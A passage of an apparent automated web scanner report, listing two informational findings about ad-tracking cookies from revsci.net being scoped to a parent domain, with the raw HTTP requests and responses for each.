rtc_5CmO=MLsv8SVKcR5n5bLrq5gACIHaNi9NrDEErILtKT6KaMjh9FvAc/FYAEbD1AFIKRnVK8Nn0XgnoG4pxoPjUZVkiOaoo9MSkxfH8UtTjXb8JspCpaCBt+pXOUV+TqfJZVi7m6lzqvCfVC1N4cRJhKoNgcxZglSP2A+b4Z3nLGdE/q9Gp8/sA+3FxZYr2PuqFmHcWUZpNNKYgpEcdYJg268e6XxvmClfh5miu6Tr9CQ6ZOsRKvERBLkWPhhnB5Eg/I3ueNCqe7ZlY/FIejkmqyA5qs0rDMa6QuyedVUcyGn4YNedOOE42PwWnqTsWu/2AU/jgvSLM1RShGnwYhixAF3Y3G8TZ6fiDYOhuQPtQsLHL/EcuAf8MKQ/uDN+4AvnXLaglfPQjeP8QbfoZwGChOp5OFp/THda2UYpirwONMkGDD+oTfaBdgJXpGHsR/+TAnm4Bj/7gtvpcaY2ohWuGCTBMVZ5Ch2WNJz777mPJO9S4RjtFKZNQPpBe0NllM17Vwt9AY2k3kxsqAUWtn/3KrPfclNZsoY=; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc8192a&0&&4da27787&00f8712b16a2747053422af6cef97d9a; rsiPus_0="MLtHr9MvsT9zJQH1Rjzvq4n0ZMEy4/DR9Gbiq+8IB5Fr6adEkwLc6i5z8KI/ee/1ZL+irruHcCQycTY5dM0pYXfqIbSfqXndCa6sLsYSD1+i/ByjHu3f8ZFwFyoByAKMs5nbJxgDfN80CaR7DLKKNHPDqSbcPEPuekVDnpipJNxfDmDOsXbvxORj+L+Da+znJZSMYWwIB2Jxj1OjZ7+c7nWqQQsEzt1nqHcyCEJtXNE3dgjOwAmET212C2QzlEkSbftEPYWS4GFSqo56H8r5JIbbe8AYfmAX9kJnLYaqCGWUC3h+XEKuD0EFIVI="; rsi_us_1000000="pUP1JU2jPiIY1S1irdS/eyBPUbLvfmNCKg8xgSBi0BgiNk7ALFYTllyJQoRpwsGfAxYQZ0y79K1JysH2KDOZWhHXxCtT0v8AFPcOwp1PLPyVCBDPJP6yYaqUGzVjcpPXvJaX/GLUP9R3hEWkGecP4PArtYF0ilLtCDAJf1g0iyqgAEeDCoDv50UADx8kFaspqLcdN9OKyP9MsuPLlDUqAmSW5pL3U4FSPVzvqxqC2sWCNjbWTutciYJDmVYOyzBso8YG/LZsyIMUIbAv2qUD2GWmsohQBmPK7E71Xro0P2DdUU1tzL4YCDzSNOuuqTWVdiwXgUk9pTvnqVGIzPDCdAZ21akDLS+hiXQj7wVeczgvWJpfRtx9nf3jw3+/nrLMZ1i+r/Iu/yS5HNXNNTGaVmguT3mBOuAsOTrXj1VieQSSFbeqjD2Q5GuPUy+gZ8E7o/dUL84MnSNihNUHO2Zis01co39H+HgZYSYS8G4QSSIT627P753yPSxzH3seIM7/KE3HPWYcrstu7zFtyOA6djmB/DwTS4va7oV1zY/Im0qT1xuUZMJT1DzVP1jYM6FkxSpdJiRQb9VhUZRPCTCvBRGJ58VeOA9aJuhanJRzGQTNDG+u8RqMXyH3gnLgMOUm9vO9yUjhDrYYB85n8VnhbeN8Wu0X8rme3Wq8pEC9tAWe525tYX0R0P4GzRsx1uolWOuaNQf5Klq5yz4="; udm_0=MLvv9SUJaSpr557EdtIXqfE3HZxD2jF7YYAV7uTQoXkALe+h8IdgKDFp4QDAVAIGzRVDE7jI/n/4akBaNcbN8GRULj1YH2UvUjE0/EtDYBCOZ+dl9gvDLo0p8jG3XS5bUMUOKNqd3og7rMda8A1/+5chhVDerwuh30DL1Nhh9Cj6S6bFYRSzWtKl9j4Az1Kp6RjX1NX3KSCYg7f5SHnfw8MaqjRB4otkU3UfI5GKa8XWv1Uox8wfWv2fmL2KS+zxfiQJzSpfuVwz1OkuPUS5T9946ZcSoWZyYS9IZgJ9YEDTKIlt69XXZ+uaSYO6zeILc2Zb5RQOQzIeqUX/+TK1kJFPG4APKKhvO8hyamsmWNpWC8G6/Cw5wVl/oHs8LM78piMOgoMMVXcofoXKIfv4RQK6Ue02i4GEPFyemadMdZtXbwz260b423Rnn0H63PKgD1eLI3hpljO8FNkGwBNAzpUY+ay9lrb/lR3AhulkHXcy7Y/FllspQpWzVatzlk54T84xesdZ4NhUATCjJQZxYS6KzN64wa1scWCtu39zCB5+H2hUHA65Z+AGcy7AEbQIcV5XeGRGO9clTz6RqYJ17KLwC5NL3KBK71a1jpqThQYxi/ptTdR1yEHu/bFF9hVsI77B0aEm8uHbquXCt1fLsk029JkoeXaiKu0+7uvNiZk4Ykged+TurlcUR4YrfdHGzTuaBCRCl6T1LFK5c2CJrLAOA+SriPRZvrm1dHkoDgbG5T4zve3gsMA/997VEJesKSZXBrEoAkGjEeaiT5g1NjqKg58EbBz/DJq3LCmYc62rxpw/SRH9dmZJRhbz6rV9xuFz2y0NlqKbCpaUGxdnaODJ0OS1Nz9dJ4lH3IsTvVVjNEmD6tju4W8zuw8zi33ip+V+nIRrgcCQa3eHzRzQz6C6GYMXPV6LAqO3QYRvkEOYH9MAaQwSFgdKpZPJ8ur1P/4M8UOK4ugnGaN7Vt0qzXmZi3XVNUhwoK19k97iwbMeDNzCridVGAJ4iO6g810j7BFqk9xppdM4j1ZZjfcnrjswWFauD8iVAwTKwQiHyOgtjZcYP9tjmvroHYChj2JPEPqL9kSfT0UoHV+Vg7jVEPgsRb6/TrNLdI1z/1NUVgew5DMD7n4Bw+ScHJZyjaafwfooCMLTekVwZ0abKM6jTBVXlDZmiBPg7sX7WMWTiRVGjBpzL6PMag==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_5CmO=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0OBbwIMV594t637UNES86Ed19nKCDeVRxV0JGXV/y20UzrToS2ouxUK6pw26DrqGgVo5jGOEYbyX/hYsFy7h6ka2YtGHF7L0J0A7uDKsLBjQfxr/bSmHu66WBFOadqLveFcaF2EAO7AQ4cRuqi+BaUIdzLqQQszXr3k5ZhVUGFXGd5SgNnJE9T9e7e8Uk97qprVdkByxBWXOQNJvlFPjhoTvUl6coK4MNy0BJqXd42sTaKNaTEfN6olwN7hJg8nrp7Rm/aF6qO5XrtU2AO+oRQixl6R22HUp4O7SlAeYro/Ri/BD6yJlbqcBop9gygWStXoGp9EYw==; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 16:51:14 GMT; Path=/
Set-Cookie: rtc_I7t_=MLsv8aVKMT5j5rKp+0udG4F6UFF3mCjA+4IAGF2JTcWQu4ojfJTgzUfD1AFIKRl+6nouXCvtEI0ktcbhLVg+ShYcIKaJGvMXsOsTQflE/DzTiDy7TuqWIEjLa/MU4QlGQCooF9mpQ0tJeQ2VDQwT+Cv3zxPCjbH8ojnofsnT8+1IiwJeeTN8Wvr2f2KW4oMLsaueiZcsAtpXRlxjmoE/Vll/GgaY0bZ+0ACIDElyqNdcOXzliGL+KtYu7cICVVaq7B0LYVSwEe0nhieZZtCJhAicP0IofjtcFE9P5/t9T1g87x1gpLbviJRWv8wvVvA2ibNvJZ+yrf1tfjCuq7RHnBQXRelMm2eh6qSZ2mggvcm42oTWOpH54IrMlBijTUDgPJRD4gL4DWXALiiGTIdG5auV9k3zqdnOmd/2I/Dna+VD25YyKAKp1/1qKfwVIBIMA01mcQQ5ekv2pdanfe6np+wbiIbASU7ajZK2vRYNaul2JT+zMHtCCRUMp230aVKd5j1i/2lRjn7sEeL2EKmfL4pYBaPl1Q==; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 16:51:14 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 11 Apr 2011 16:51:13 GMT
Content-Length: 729

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs=['D08734_70852','E05510_10451'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.repl
...[SNIP]...
5.100. http://pix04.revsci.net/E05510/b3/0/3/1003161/844383816.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05510/b3/0/3/1003161/844383816.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05510/b3/0/3/1003161/844383816.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.foxnews.com%252Fpolitics%252Findex.html%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.foxnews.com%252Fpolitics%252Findex.html%26DM_EOM%3D1&C=E05510 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/politics/index.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; NETSEGS_E05510=379226250c6302c7&E05510&0&4dc81472&0&&4da25a08&00f8712b16a2747053422af6cef97d9a; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc8147b&0&&4d9fd802&00f8712b16a2747053422af6cef97d9a; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc816d2&20&10385,10387,10389,10395,10397,10402,10408,10406,10410,10412,10413,10419,10033,10336,10363,10424,10426,50033,50052,50000&4da2566e&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc8192a&0&&4da27787&00f8712b16a2747053422af6cef97d9a; rsiPus_0="MLtHr9MvsT9zJQH1Rjzvq4n0ZMEy4/DR9Gbiq+8IB5Fr6adEkwLc6i5z8KI/ee/1ZL+irruHcCQycTY5dM0pYXfqIbSfqXndCa6sLsYSD1+i/ByjHu3f8ZFwFyoByAKMs5nbJxgDfN80CaR7DLKKNHPDqSbcPEPuekVDnpipJNxfDmDOsXbvxORj+L+Da+znJZSMYWwIB2Jxj1OjZ7+c7nWqQQsEzt1nqHcyCEJtXNE3dgjOwAmET212C2QzlEkSbftEPYWS4GFSqo56H8r5JIbbe8AYfmAX9kJnLYaqCGWUC3h+XEKuD0EFIVI="; rsi_segs_1000000=pUPFJ0OBbwIMV594t637UNESU50e19nKCDeVRxV0JGXV/y20UzrToS2ouxUK6pw26DrqGgVo5jGOEYbyX/hYsFy7h6ka2YtGHF7L0J0A7uDKsLBjQfyzmVKgBYCKKxTZuxZHFHYbHosr+2FiGJnoSu9TOv0Ed0bwHzoYlR5nQpDVycN0wf1gGfc1aLnqIutIcbCuLukCwLvansX84C75JXqHxK+ZkcdTMwYFZY3hIHudmPzpyCeSKo+8elpwJtHbrQXlnceLv9l9AfZIN+3WXAyns810GYaxcIC54TKzzwAL4CbduJcLn17Ni6mcBpy4PykrwNOYQ5xEZQ==; rtc_Eo2d=MLsv8aVKMT5j5oLEkrhIMohGIOhkT2KrqjTC5Waa85sd3XtYJlhOwG1tfjK7UWmvp+UXB+11jW4pxhvc9EIyKcbf18wDEpPP9J3s63g7N4gnniGrGmYG6i5VHFLqEP1X3/2H7VCrwcXndfedqtqR/qCtqPt+0Q+bTPdy7X8RiP+3VIJDEnzycFgtpSt4FyrYNpWdHZybWfgqNUd84d96t/tOdIoVUoeTNAh0V0yrFDcbJGVrs3NCoUKLL/us5jAPfUQKUkTrPComdnLK11baAPXRgDACqxX152M0Wx6tr6STLNH6Ipn2Za37FPk5D38UmNaFlaeYgvtCOiXAC0hdmtBShNPv+9selQXtPLMtpAvSGnOFdRE5UTzhoa6hsiZkjy3bfoCnFn6kAzCvN0CSBUVTjhduVFNSTojejG7zhUcxLLELAO0+zZWn9k4dxgIaRNpx7k+9tKld56fRWzzi5bDtT9uB3UxAlsyZIUHL2/UrZ4t7jsaW4bBuCK8PdFhIyid8JfdqWso1Sxro/9ulzTKEVwaw+ts=; rsi_us_1000000=pUP1JU2jPhIc1A0uGejL/IkyHP/iCy1YlHTtDOL8O4HVofQkYq4TJih0lxuQpcssPgTTO6N6cGG/v/3x265qQaEMDAY+dk6xoGMF736Z36xPuDqQN2kFYuGgViRdfhNQyV6kwFS8LEKGF1AlwCVvI3GaR/mPmmaZNLb2mc0jtqwCSlognlWmh7oLiO6Nl5gf7WxwKFG8J4px03dvVUGdK2CxNWDtUrGqyMo63/W6oHKpyFJv8tYSJWVc69DYDFXLIllYUaGnbOfwvWLRoBMiWHShooAzncA4eMP02fRj8WLtJScn7Tx5eOVxxabxnCYbxlpZmVMBNbrDnuaJBmOtX9zXmbuFl7k0imYebm/nefW6Jy5YZgrf7hGajtmyoJfeZhhJrQRGZFfLvSGyv3CbNQ91VEatgnZwCntqkD8M7uJW1/afUPY5rNJ31HXWmUv4l1+uATGRnIWV6FE22GKXegwZwAkJa0Lhxbl/t8l0NvYGYXic+4HGh+JhuZvj0LAW45KfWAQjpv+9yJRC3RwErx2XejmGAz/zOr+MPbjvNrhZIAmtp/dhQDM7yHKAP+uJM+uIODBbO9iTC0e/sjbDw6Gi6wA0pG1neX33OdiKDs12ogA+lAZyg4LV2ayrFMnIKT4hUzB3MZpPr140AevGziLRMpl3bme1q33wEvoJhvJk7uDC2BdBjFw5bdod8Cnzj8/WJbGu4kLeMP0fCtAq0+BNTEo=; udm_0=MLvv9SMJaSpn557EdtKGREzM5uAkEsBEcLqEBjKmOxigTwd3JroPKHhBEknhsvqTAE9Wvh6ZCxtEwuWCMc/HeFcDwqHXN49yYG00YWJzQGMfhXD6eaVK0BWAQCZrKOnsVHMSFFaI0oRfUo3CmZVJP+yyATY0TaMOLuuvmF9lS5clgGYKNXsAHk8G9+u6GoZXLYxSga2Yld1wA0fVVnDUZzRqCt6j8kaLJBtvgyaoCVLftAUfi6+EHEu8/bLemDWcmWWMhppjV9On6y5ycKMkyu7TNHsZ/x+EVnPg4AGIIGlzjUXAsQssKgvpNIGMFhrOFJCv8PUGJr6MGJ7BzEqNIGhbTjclQq+wCCcK6jECb4SCuT4iR7iM+YJHizNKGiFOHJdgrltp753l14/z5K85sfFYT/RXqPoKTZuXthKfS7+i8Fiq4YGrPvUscOA+TtC40T+GWXIbXLCDzQoIyX7gwToDwnOG1oB36zxVTZo86Tvg5PCMyjcoieBKpLbygxma8EKf5AGe5USis3KU7kueoE1DgJYPSQMErI78LK9QhIIcoZAmaCkiu6na81hz8iDIP6T3GL8EGebiKMsir6WZ1y48ARMVF2IiLgWii6FpKJLwI+uiD0fgAJjlGolCAE+XNypxUEbL2oYxRxQanLHB7DKCuq7XSTzrI72C4oL0VozaEk9xM5ZLeZOAfDoVgzc+Yped6+ccVtD3nY6iSzBIckXUi+Bu+dX7qwGlme9o4t0VNxEz4COrTyglhj6ajNOo+SCtqkJE4PZ9eSd/HVS74wesr0C4HH+YkpTEnE06uaLDxO3/lh7xv0CBBNrJoH5Yb1Z8dY8vUru1PpAD0cZJw6pdEs/JV7mx7kZmGFcUFxj6wVlmS9fRzY1WtoT10zaXnZGd29vHrjlS818OtO5YwMEFFdxqW/7e41ZIYi52KrWHbMABr2yllZKaFjg/3gMMRl+bF5czKi3c6823QxEobPMEtTpD56yOd9ZeMQcsKRydBKyXqr0JFfZRmzMITG669jRs9AKqgBQqitGojVbABfIFzpzNVP/lneMYL30A7Ts98bgNtHFtOrmj+lqMmwbar7SXeoCm8x0B2xV2Rs4/F5/O3kqUttd3LCqhmAyAp4+qEAfQCXRxuVO15gEajqaurRb0hqhynWo9YT2VY+l/H+ghMLM4ugrThIQVDwRXn6cePB6KyWDwpY1ZoD9mmGo2Royk

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_Eo2d=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5kOBLwIMpzaxu2E2X50BYKwAEKTaYgYB7RmorjQ0sQ/Z0pMs/uNhWv9kDsM6I1OyNKGAI79hIwKvbOAlumXzgyuUaTFaCH+V4aSgqG2GMjvmSy+4mu22o+sIcAigrxYBwOnFIdqzXCCrXdEH3+Olb6OSMFWO3iaX3U4x5KBzIAVnlhd1O0W2AYTCeO1WiZw6d1/bEfwpa9Jx+T0t2HymXAB5ZMZdvwCql4xopO4TGbW7nqCe6YKCE5Urm5Kq9x1S6UwczQ3lIQWdHhtc7QWf8fO2I4SxcCgnIC8RIqIJfAGhhifSnDNP9bucfEQyRHkdStXoA9JEZQ==; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 17:21:16 GMT; Path=/
Set-Cookie: rtc_52Lf=MLsv8SMucB5j5hAHsvmC/212VHiLIgT9sbGvQkQvAn6pCKQr++AMLTjMcTR3X9clWXr6/EHvlLxpLeBARJAuRdRj1F0WnxHvU4nMjmbEJkrytYgF9upXx0BmPmcWclj7GqnTqjCek60lbV4knro6q3gugsiw2A+bkb3nLGd8/i9FR9+5s2s5I4LZ0CvsNmZ8ZO3PF7AYfZXEAg9s8iNohu3nKPT8MU4EgeE7LkI1xlwspRSRJ6jHN51kB8VDsGE34CNx40G+MPuq56f7aNHKGI0zT0UQTEQ8fPcPW25D8jMKf5iUd4cUrIbfvsv9lxJtx35ggMRINRusKXfSJgHfdK/B8KnhQcKMkaRZPvwVwkEKW8hp4jxSmndOCs8UqxUe0lHcwIE4ocZ9LXgbkythtenPT2km2EYnjLwa1z1tsrUITPYDdgJQpGHyR/+jn7dJCD/L1zCkMBgUF1kQNKjQy+d+ZUiFR5TH5bmFJe9Q4TjxEiZN5TKjBKzFd1pMdrFRpMJWiSduF67sZywI2OlfMce9lg==; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 17:21:16 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 11 Apr 2011 17:21:15 GMT
Content-Length: 729

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs=['D08734_70852','E05510_10451'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.repl
...[SNIP]...
5.101. http://pix04.revsci.net/E05510/b3/0/3/1003161/846854188.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05510/b3/0/3/1003161/846854188.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05510/b3/0/3/1003161/846854188.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.foxnews.com%252Fpolitics%252Findex.html%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.foxnews.com%252Fpolitics%252Findex.html%26DM_EOM%3D1&C=E05510 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/politics/index.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; NETSEGS_E05510=379226250c6302c7&E05510&0&4dc81472&0&&4da25a08&00f8712b16a2747053422af6cef97d9a; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc8147b&0&&4d9fd802&00f8712b16a2747053422af6cef97d9a; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc816d2&20&10385,10387,10389,10395,10397,10402,10408,10406,10410,10412,10413,10419,10033,10336,10363,10424,10426,50033,50052,50000&4da2566e&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc8192a&0&&4da27787&00f8712b16a2747053422af6cef97d9a; rsiPus_0="MLtHr9MvsT9zJQH1Rjzvq4n0ZMEy4/DR9Gbiq+8IB5Fr6adEkwLc6i5z8KI/ee/1ZL+irruHcCQycTY5dM0pYXfqIbSfqXndCa6sLsYSD1+i/ByjHu3f8ZFwFyoByAKMs5nbJxgDfN80CaR7DLKKNHPDqSbcPEPuekVDnpipJNxfDmDOsXbvxORj+L+Da+znJZSMYWwIB2Jxj1OjZ7+c7nWqQQsEzt1nqHcyCEJtXNE3dgjOwAmET212C2QzlEkSbftEPYWS4GFSqo56H8r5JIbbe8AYfmAX9kJnLYaqCGWUC3h+XEKuD0EFIVI="; rsi_us_1000000=pUP1JU+j/wMU1E0vl4/J6zrPsVJPDYgHCU8fsTBuluz5+S3eA7ULCcbRjLsDxQ0XhQJGfpsqxs5N0PETdyHg4VBkVdp6Gl6hsTKoCFLeJxXiTezu+04jKq2slyRVFzPhwZBzfO1d1zmUTd8yIAbceGlapvPADl9T4MKg/sUEk0mjyvuJ1ghqgbYz6Ui1AWSrCnWvoWN75YlK62L+jLLWzJuNWXwluA4Yq7dlKNXCmJtpjmApatavjZjww1LyMGWTJ4VO/H8KS0LTmv4VNtBT0LWE1/8jL/0TOx4t6oCGj3ztgwlE7Jh6QDqVyScOs0EZvvf4qeAEp8TcMk27jCKfGjAqLGmlOG6iRV6GSraN+IHmXmX9PziRRx8pqDnBjc9ElU6ZsnoqYjQtOnIbtSU55e2zVVHeHSdmz4GTCkJ/a2O3q/5rhuDwqkBx569cjdP2eZM93P7t/T0z4uICk3paDWBedWfYWiveE6H3lzQ/p3+2WF/Xnjfdwc5kHSTV0WPJV1LsemYKpfu9yJxKjdopPK5HY+xCAV+/PoJ+ISzGUpwxXHb530wWA818zYtP3nkqF1Ct/2rff3MEnenaThym1LQpMqVgtvnB1c7aMNiSDs12ogA+FAbyhIGVOayrFMnIqb9BEwBJIZRHZ1k2gJf21izZNZt2b4b1i23gCvYPgfJk7pSE/pei5Vy6/1/2ipUKv+idq6GTLgISKOAsKJ4o1LEhTdI=; rsi_segs_1000000=pUPF5kOBLwIMpzaxu2E2X50BYKwAEKTaYgYB7RmorjQ0sQ/Z0pMs/uNhWv9kDsM6I1OyNKHoXvpuIwKvbOAlumXzgyuUaTFaCH+V4aSgqG2GMjvmSy+4mu22o+sIcAigrxYBwOnFIdqzXCCrXdEH3+Olb6OSMFWO3iaX3U4x5KBzJgVrlnfnda6j4PUOH9nRQH1zMW+U6fez+VR7HE77ryC//hTjJ9arzeRlwEtNZ8eyhqa74y+foiLcHccvHcuKOY4HS8NlCCyWynzGxeqDXQJiphQixt6RW96x2wQpuVAUxG0tWc8tjkgLyIGx1Ue+AtmZhdCgwsZEZA==; rtc_KY6k=MLsv8SMucB5j5hAHsvmC/212VHiLIgT9sbGvQkQvAn6pCKQr++AMLTjMcTR3X9clWXr6/EHvlLxpLeBARJAuRdRj1F0WnxHvU4nMjmbEJkrytYgF9upXx0BmPmcWclj7GqnTqjCek60lbV4knro6q3gugsiw2A+bkb3nLGd8/i9FR9+5s2s5I4LZ0CvsNmZ8ZO3PF7AYfZXEAg9s8iNohu3nKPT8MU4EgeE7LkI1xlwspRSRJ6jHN51kB8VDsGE34CNx40G+MPuq56f7aNHKGI0zT0UQTEQ8fPcPW25D8jMKf5iUd4cUrIbfvsv9lxJtx35ggMRINRusKXfSJgHfdK/B8KnhQcKMkaRZPvwVwkEKW8hp4jxSmndOCs8UqxUe0lHcwIE4ocZ9LXgbkythtenPT2km2EYnjLwa1z1tsrUITPYDdgJQpGHyR/+jn7dJCD/L1zCkMBgUF1kQNKjQy+d+ZUiFR5TH5bmFJe9Q4TjxEiZN5TKjBKzFd1pMdrFRpMJWiSduF67sZywI2OlfMce9lg==; udm_0=MLvv9SUJaSpr557EdtIXqfE3HSBwPslkZwvSPcK5G2swwjyHqQ3cxWOjDfyeIe8piuus7NCcw2bXAGlsdETPkq36I/Y42AJDYs9LsElwk1ke5DjqsTUwXJGkrVMMf9nB+bFWzbqFt46th5h6SNJ0Kpjernk8hlyHpHgv2r37LaSp7gSzfmYI/riLLNRYLRmFv9vbjuEsRV4gkAgtfeskOSu9BFF3QRF5fuvBfRka5Lu8FPLe07fE+o4YC4mUaxop7MNdMV53Fh5IISMnSmkL9iFQpZi4iWVyaL2XYkppgPSiQ5X4Gbs44qyab5mX1qBObgP5ud3WbvXeB/MmK1KCgnj2xpe3QB9gTCrV5OZC9TpgXSrtL13LUPj0B2xQ+jY8oWMOgqMMVXcofoXKIfv4RQK6Ue02i8EE/F+WmadMdZtXbwz260b423Rnn0H63PKg71SLI3hpljO8FNkGwBNAzpUY+ay9lrb/lR3AhulkHXcy7Y/FllspQpWzVatzlk54T84xesdZ4NhUATCjJQZxYS6KzN64wa1scWCtu393CB5+H2hUHBa5Z+AGcy7AEbQIcV5XeGRGO9clTz6RqYJ17KLwC5NL3KBK71a1jpqThQYxi/ptTdR1yEHu/bFF9hVsI77B0aHm8uHbkmXCt1fLsk029JkoeXaiKu0+7uvNiZk4Ykged+RurlcUR4YrfdHGzTuaBCRCl5j1LFK5c2CJrLAOA+SriPRZvrm1dHkoDgbG5T4zve3gsMD/997VEIfs6SZXBrEoAkGjEeaiT5g1NjqKg5/EbBz3DJq37CmYc62rxpw/SRH9dmZJRhbz6rV9xuFz2y0NlqKbCoaU+xdnaODJ0OS1dz9dJ4lH3IsTvVVjNEmD6tju4W8zuw8zi33ip+V+nJRTgcCQa3eHzRzQz6K6H4MXPV6LAqO3QYRvkEOYH9PAagwaCgdKpZPpgur1P/4M8UOK4ugnGaO7VtwozXmZq3XVNUhwoO19k77iwbMeDNzCridVGAJ4iO6g870g7BFqk9xppdM4j1ZZjfcnrjswWFauD8iVAwTKwQgH1+iNfj+e6AdSVFZHFH/qCWo9vCy0SyqMMBzhr9qJkV7LiGb2KeCnPMA0WrVxTzLID5jPqc6Qc16eXmqfmp5KjPyq41bHv+QOYyVDUlSV9z/1NrwfvQ1vhoigdB1YHBb/sA0uqppwb0nLrg==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_KY6k=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF50OBL3IQT7uItGE2X52BegxWE6TaYgYB7RnoMcJSvrO+9OLE5ntqFncA2iMgLzp6KRZ8pLE744Tm93MOZ7zFHcbP2P2np4Hjp7CivkjLdnBnw6DcfOutzdt7dZ9yY9qoV66z93VI0+JHf9oWZ5Qlv+bSpDw+by8Y2t6go+HjVgBnzk+UJ8ECB1XwYKk/SbXieYz8CCbKtClSvayedpthQ/j20IA40/U2LL7mbh43eQgaHdiTyety9QXwvwy4cMtQ9sURG8lVb4HTQq4Dtybd0btbP9FBmlQD9DKYvfniu4Ax0XQFDB8YO886o4enJYP+hdCgexJEYw==; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 17:31:15 GMT; Path=/
Set-Cookie: rtc_qMxP=MLsv8SNKcR5j5gKpOJPAaM1326Pgb/GNqsTY0NBa85tW2nZ+4HclLI+UJ2ITMNEFEk2HLmH0enhjxzNy9BxliOCugfHcmbJH8Y3cFWcEJkoClbAJNOpXzUZmzifpQzufoP1H7NCkzcTndfddq9oW/qCtqKNe0Q+bXJhy63+RiD8V9pIR02XA7ftd4gt6Fy7YvLatgI+ei0vAChIQd15DgUXLWoixpPVYawV3Flca8b/KKkAFs2NFpgIJTLcxOajJX0T+ISe1UmUP8t0onGfGZRmuQqQRfmW8IvIgl5n1QjVewSFnOZk2ZK27ZPm5RTddB76fAcjxcBRhviEHPY+rnFJE8Cm3PNYWZAEV2YQjpcu42oRWrwM0IAG4zYzzZCP0TJZD4jLuDf0W6jDbW7M2ff57dgeG7NNJiENw884u0XOx5v51YrEHXXGGpOceQzfmTGblCssqneFWbQLGeG7YskyHLS07dK4O+wfpTMwCihN0LcewWMQtbdn3qnEpDQi1zMltbwaPxz5w8Zqq2wPcL+aYaAN4+yE=; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 17:31:15 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
